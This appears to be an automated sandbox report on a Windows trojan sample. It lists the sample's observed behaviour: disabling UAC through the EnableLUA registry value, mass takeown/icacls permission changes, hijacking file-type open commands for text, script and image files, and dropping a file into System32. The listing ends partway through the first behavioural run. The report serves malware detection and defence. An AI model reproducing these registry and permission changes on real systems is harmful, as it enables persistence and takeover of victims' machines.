Malware Analysis Report

2024-12-07 14:48

Sample ID 241010-s5t72stanb
Target adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N
SHA256 adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77
Tags
defense_evasion discovery evasion exploit persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77

Threat Level: Known bad

The file adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion exploit persistence trojan

UAC bypass

Possible privilege escalation attempt

Disables Task Manager via registry modification

Modifies system executable filetype association

Modifies file permissions

Checks computer location settings

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: GetForegroundWindowSpam

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-10 15:42

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-10 15:42

Reported

2024-10-10 15:45

Platform

win7-20240903-en

Max time kernel

150s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

Signatures

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\reg.exe | N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A
N/A | N/A | C:\Windows\System32\icacls.exe | N/A
N/A | N/A | C:\Windows\System32\takeown.exe | N/A

Modifies system executable filetype association

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\stordiag.exe | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
File created | C:\Windows\System32\stordiag.exe | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe HTMWF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe VBSSF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe CMDSF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe RTFDF %1" | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\reg.exe | N/A
N/A | N/A | C:\Windows\System32\reg.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2084 wrote to memory of 2348 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2348 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2348 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2384 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2384 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 2384 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\reg.exe
PID 2084 wrote to memory of 1324 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1324 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1324 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 3040 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3040 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 3040 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2964 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2964 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2964 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 2340 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2340 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 2340 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
PID 2084 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1696 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\takeown.exe
PID 2084 wrote to memory of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe | C:\Windows\System32\icacls.exe
